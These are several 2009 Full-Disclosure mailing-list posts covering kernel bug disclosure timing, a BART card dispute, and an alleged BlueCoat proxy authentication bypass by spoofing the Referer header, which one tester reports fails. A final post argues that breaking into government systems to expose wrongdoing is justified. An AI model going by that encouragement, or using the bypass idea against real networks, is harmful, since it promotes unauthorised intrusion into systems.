Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Mr. Magorium's Wunderbar Emporium
On Fri, 14 Aug 2009 14:53:06 EDT, Brad Spengler said: Congrats Linus on screwing over all the vendors and every Linux user by forcing disclosure of the bug before vendors could ship out updated kernels. Your patch applies well to their binary packages. Poor Linus can't catch a break. Just like 3 weeks ago some guy named Brad Spengler was ripping him a new one: (Really there should have been a CVE for the lack of -fno-delete-null-pointer-checks instead of pretending the only problem was /dev/net/tun. As the commit to add it showed (and at least 10 other commits to the kernel this weekend) lots of other code was affected, so someone not applying a fix for a CVE mentioning only /dev/net/tun because they don't have the code for /dev/net/tun compiled in, is going to be missing out on a number of fixes). Of course, getting a CVE for that issue would have forced disclosure of the bug too, quite possibly before the vendors were ready to ship updated kernels. In general, you *can't* have both flag fixes as security issues right up front before vendors have a chance to backport and don't screw over the vendors and users. So how do you suggest that Linus could have handled this in a manner that didn't screw over vendors and users? Out of curiosity, did *you* did your due diligence and didn't release that exploit until you had verified that all the vendors had updated kernels ready to ship? :) pgpDUjsaCWRnL.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] BART
Hello auto793...@hushmail.com, As I've previously mentioned, I did not write the first (very boring, uninteresting, technically incorrect) email. It is certainly the case that BART uses stored value cards. BART admits this if you ask them. However, basically everything else in that email is nonsense in the context of BART. Best regards, Jacob signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
Hi, ** Test two : i just add a spoofed http header REFERER to a whitelisted (localdatabase) site Result : W00t !! ** Can you elaborate on, to a whitelisted (localdatabase) site? i think it basically means 'to a site thats been configured as allowed in the configuration of the BC' - allowed = whitelisted, int he configuration = localdatabase alan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ByPass a BlueCoat Proxy 8100 Serie authentification
i think it basically means 'to a site thats been configured as allowed in the configuration of the BC' - allowed = whitelisted, int he configuration = localdatabase alan Alan, The Bluecoat 8100-C I'm going through has 27 policies in the Web Access Layer. The first policy is configured to ForceContentFail for a list of destinations (a blacklist since colors seem to be in). The next 15 (2-16) policies are all DENY rules for specific hosts, IPs, regex patters, filenames, etc. The next 10 rules (17-26) are for destinations that should Bypass Caching. The final rule (27) is, Source: Any - Destination: Any - Service/Time: Any, Action: Allow. Google.com isn't listed anywhere in the first 26 policies - anyone on the LAN can access Google without authenticating. So, if I understand what you're saying, I should be able to spoof the Referer string sent from my browser to something like www.google.com, or cnn.com, whatever isn't listed in any of the DENY policies, and not only bypass authentication, but access sites explicitly defined in the deny policies? If that's the case, circumventing the auth or accessing blacklisted sites isn't happening. This is good of course; the device is working as it's supposed to, but I would like to confirm whether or not we're susceptible to this alleged bypass. So far, looks like a dud... Not even sure why this would work, it seems too simple. -Guy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] (USA) Fighting the tyranny of fusion centers / JTTF harassment and profiling
Was wondering what FD's opinions were on fusion centers. www.aclu.org/fusion They are essentially COINTELPRO survellience techniques employed by the FBI-State-Local police to gather intelligence on people. And yeah, you guys fall into the scope. I was wondering what your opinions were on this government surveillance stuff. Do you have local police (turned domestic intelligence agents) have the sophistication and complexity to understand what you do? Or do you think you'll end up like Ricardo Calixte, and get raided for using Linux. http://www.eff.org/deeplinks/2009/04/boston-college- prompt-commands-are-suspicious I was wondering what you thought abuse of power by the government. And how to stop it. I think that cryptome and wikileaks is the way to go. If you see the government doing something illegal, do you have the right to break into their system and uncover the evidence? Google plain sight rule. Sure, if it's not that you'll probably go to jail, but if you hit the gold mine of their corruption, you're set. Freedom of information? COINTELPRO was owned by citizen's investigation into the FBI. It was illegal to search the FBI office. However, it offered a sweeping change in legislative policy after, since the evidence could be shown in congress. Where are all the upset feds? Blow the whistle. You can get your info out 100% safe, Get TOR (http://www.torproject.org/). Post your stories on this list, Wikileaks or Cryptome. This post was sponsored heavily by n3td3v intelligence ~~ n3td3v is not antisec. the metasploit method is ineffective. ~~ you need to get the intelligence feed at www.twitter.com/n3td3v. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/